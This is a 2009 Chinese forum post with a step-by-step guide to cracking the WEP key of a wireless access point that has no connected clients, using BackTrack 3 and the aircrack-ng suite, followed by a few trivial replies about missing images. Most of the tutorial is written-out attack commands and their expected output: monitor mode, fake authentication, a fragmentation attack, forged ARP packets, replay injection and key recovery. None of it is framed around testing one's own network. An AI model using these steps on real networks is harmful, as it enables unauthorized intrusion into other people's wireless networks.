永城人论坛

 找回密码
 我要注册

QQ登录

只需一步,快速开始

搜索
查看: 9227|回复: 4

[电脑应用] BT3下破解无客户端wep简明教程

[复制链接]
发表于 2009-6-20 10:03:10 | 显示全部楼层 |阅读模式 来自 上海市

马上注册,结交更多好友,享用更多功能,让你轻松玩转永城人论坛

您需要 登录 才可以下载或查看,没有账号?我要注册

x
BT3下破解无客户端wep简明教程(图文版)


1.装备: dell D410笔记本、linksys wusb54g v4 (加装12db 八木定向天线)、bt3 usb 系统  (如图)file:///C:/DOCUME~1/ADMINI~1/LOCALS~1/Temp/msohtml1/02/clip_image002.jpg
file:///C:/DOCUME~1/ADMINI~1/LOCALS~1/Temp/msohtml1/02/clip_image004.jpgfile:///C:/DOCUME~1/ADMINI~1/LOCALS~1/Temp/msohtml1/02/clip_image005.jpgfile:///C:/DOCUME~1/ADMINI~1/LOCALS~1/Temp/msohtml1/02/clip_image007.jpg



2
.启动BT3,打开一个窗口,输入ifconfig a 查看网卡  (顺便记下自己网卡的mac,后面要用到)

   我的网卡是rausb0

   再输入ifconfig a rausb0加载usb网卡驱动

3.
输入airmon-ng
start rausb0
6
激活网卡的Monitor模式

   后面的6 是你要破解ap 的工作频道  根据实际,换成你破解的ap的实际工作频道(下同)。file:///C:/DOCUME~1/ADMINI~1/LOCALS~1/Temp/msohtml1/02/clip_image009.jpg

4.
输入抓包命令,抓包并查看你要破解的apessid
mac

   输入命令
airodump-ng --ivs -w name -c 6 rausb0
,其中,rausb0是你破解用的网卡接口名(下同),这样,你的窗口将显示一个工作站,可以看到你要破解的apessid mac ,并记下apessid mac

file:///C:/DOCUME~1/ADMINI~1/LOCALS~1/Temp/msohtml1/02/clip_image011.jpg
5.上面窗口不关闭,另开一个窗口,输入命令,用自己的网卡连接要破解的ap
       输入
aireplay-ng -1 0 -e ap
essid -a apmac -h 自己网卡的mac rausb0

       这时,系统将回显
Sending Authentication Request

Authentication successful


Sending Association Request
Association successful :-)

file:///C:/DOCUME~1/ADMINI~1/LOCALS~1/Temp/msohtml1/02/clip_image013.jpg

6
.输入aireplay-ng
-5 -b ap
mac -h 自己网卡的mac rausb0
来获得xor文件

file:///C:/DOCUME~1/ADMINI~1/LOCALS~1/Temp/msohtml1/02/clip_image015.jpg
如果一切顺利,系统将回显
Use this packet ?

输入y
回车,将得到一个至关重要的xor文件。file:///C:/DOCUME~1/ADMINI~1/LOCALS~1/Temp/msohtml1/02/clip_image017.jpg
  再输入ls
查看当前目录,你将看到刚才生成的一个后缀名为xor 的文件。

file:///C:/DOCUME~1/ADMINI~1/LOCALS~1/Temp/msohtml1/02/clip_image019.jpg

7
.输入packetforge-ng -0 -a apmac -h 自己网卡的mac -k 255.255.255.255 -l 255.255.255.255 -y fragment -××××-××××.xor -w mrarp
其中,–l中的lL的小写,别和1混淆,而其中的××××-××××.xor 是你刚才生成的文件名。file:///C:/DOCUME~1/ADMINI~1/LOCALS~1/Temp/msohtml1/02/clip_image021.jpg
系统回显:Wrote packet to: mrarp

8
.输入aireplay-ng -2 r mrarp
-x 1024 rausb0
,发包攻击.其中,-x 1024 是限定发包速度,避免网卡死机,我选择的是1024file:///C:/DOCUME~1/ADMINI~1/LOCALS~1/Temp/msohtml1/02/clip_image023.jpg
  输入y
回车  攻击开始  

file:///C:/DOCUME~1/ADMINI~1/LOCALS~1/Temp/msohtml1/02/clip_image025.jpg
  这时,前面的抓包窗口上的data将迅速增加。
file:///C:/DOCUME~1/ADMINI~1/LOCALS~1/Temp/msohtml1/02/clip_image027.jpg

  到数据增加到3万以上时,另开窗口,启动

aircrack-ng -n 64 -b ap
mac name-01.ivs

   其中
64
64位密码,如果是128位,换成128即可。file:///C:/DOCUME~1/ADMINI~1/LOCALS~1/Temp/msohtml1/02/clip_image029.jpg

另外,假如你用的是BT2系统,方法一样,但要对系统中的Aircrack进行升级。因破解环境往往无法在线升级bt2,故先将aircrack-ng-0.9.1.tar.gz 下载到本地硬盘,我是放在c盘的根目录下。
   usb bt2 系统启动bt2,进入界面后,打开一个窗口,
   输入cd /mnt
   输入再输入 ls
   这样你就能看到你的硬盘名 一般是sda1 hda1 hdc1(我的就是hda1
   再输入

cd /mnt/hda1
或者cd /mnt/hdc1, 就是进入你的c盘根目录。

   再输入

tar -xf aircrack-ng-0.9.1.tar.gz

   再输入

cd aircrack-ng-0.9.1
再输入


make clean && make && make install
这样,你就可以直接在新版本下破解了,方法同上。
发表于 2009-6-20 10:05:28 | 显示全部楼层 来自 广东省深圳市
((em:05))
 楼主| 发表于 2009-6-20 10:07:59 | 显示全部楼层 来自 上海市
为什么显示不了图啊??
发表于 2009-6-20 10:15:26 | 显示全部楼层 来自 西藏山南市
为什么显示不了图啊??
卉迪科技 发表于 2009-6-20 10:07
显示不了说明你没发好,还玩电脑类来,再说了这么多高端数字谁看得懂
 楼主| 发表于 2009-6-20 10:54:44 | 显示全部楼层 来自 上海市
我玩电脑并不玩论坛,俺是论坛新手看不见吗?
您需要登录后才可以回帖 登录 | 我要注册

本版积分规则

关于我们 | 联系我们 | 广告投放 | 删帖申请 | 隐私保护 | 使用帮助 | 法律声明 | 举报不良信息 | 返回首页

 

永城人,网聚永城人气! 凝聚永城力量,打造网上永城! 拒绝任何人以任何形式在永城人论坛发表与中华人民共和国法律相抵触的言论!

永城人论坛QQ群列表 | 友情链接/商务合作:QQ/11963852 | 投诉申请/媒体合作/联系站长:QQ/29578249

永城人论坛信息均由注册会员个人自由发布,永城人论坛不承担由于内容的合法性及真实性所引起的一切争议和法律责任!

永城人论坛法律顾问: ITlaw-庄毅雄律师

友情链接:永城生活网 | 永城房产网 | 永城招聘网 | 永城人才网 | 永城市信息港 | 永城信息网 | 永城人才招聘网


豫公网安备41148102000102号 增值电信业务经营许可证:豫B2-20210282

QQ|手机版|Archiver|永城人论坛 ( 豫ICP备17039736号 )

GMT+8, 2024-5-30 02:38 , Processed in 0.576180 second(s), 22 queries , Gzip On, MemCache On.

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表